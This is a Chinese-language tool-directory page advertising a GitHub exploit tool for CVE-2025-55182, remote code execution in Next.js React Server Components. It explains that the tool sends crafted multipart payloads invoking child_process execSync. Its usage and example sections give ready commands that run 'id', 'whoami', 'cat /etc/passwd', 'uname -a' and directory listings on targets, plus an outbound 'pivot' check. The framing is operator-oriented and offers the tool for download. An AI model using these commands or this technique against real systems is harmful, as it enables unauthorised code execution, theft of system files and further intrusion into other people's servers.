Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
POC-CVE-2025-55182 — POC-CVE-2025-55182 | Kitploit
工具/GitHubGitHub/devvaibhav07/poc-cve-2025-55182
漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubdevvaibhav07/poc-cve-2025-55182

POC-CVE-2025-55182

POC-CVE-2025-55182

查看仓库
29个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 高级扫描器

一款针对 CVE-2025-55182 的全功能利用工具——远程代码执行,攻击目标为 Next.js 中的 React 服务端组件。 该扫描器自动构造 multipart 载荷,并利用 process.mainModule.require('child_process').execSync() 在易受攻击的实例上实现任意操作系统命令执行。

功能

  • 自动载荷生成器——无需手动编码
  • 命令执行,附带干净的 STDOUT 提取
  • 自动协议检测(缺失时自动添加 https://)
  • 正确的 URL 解码 + 换行恢复
  • 彩色富输出,便于操作员快速反馈
  • 错误指纹识别(500 / 403 / SSL / 超时 / WAF 模式)

安装

root@kitploit:~
chmod +x scanner.sh

用法

root@kitploit:~
# 默认扫描(执行 'id')
./scanner.sh -d vulnerable-app.com

# 自定义命令执行
./scanner.sh -d vulnerable-app.com -c "whoami"

# 显式指定协议
./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"

选项

Screenshot 2025-12-09 at 16 13 23

示例

root@kitploit:~
# 验证 RCE
./scanner.sh -d shop.example.com

# 系统指纹识别
./scanner.sh -d shop.example.com -c "uname -a"

# 枚举可写路径
./scanner.sh -d shop.example.com -c "ls -la /var/www"

# 辅助跳板——检查出站访问
./scanner.sh -d shop.example.com -c "ping -c 4 google.com"
下载工具

欢迎通过 mailto:[email protected] 联系我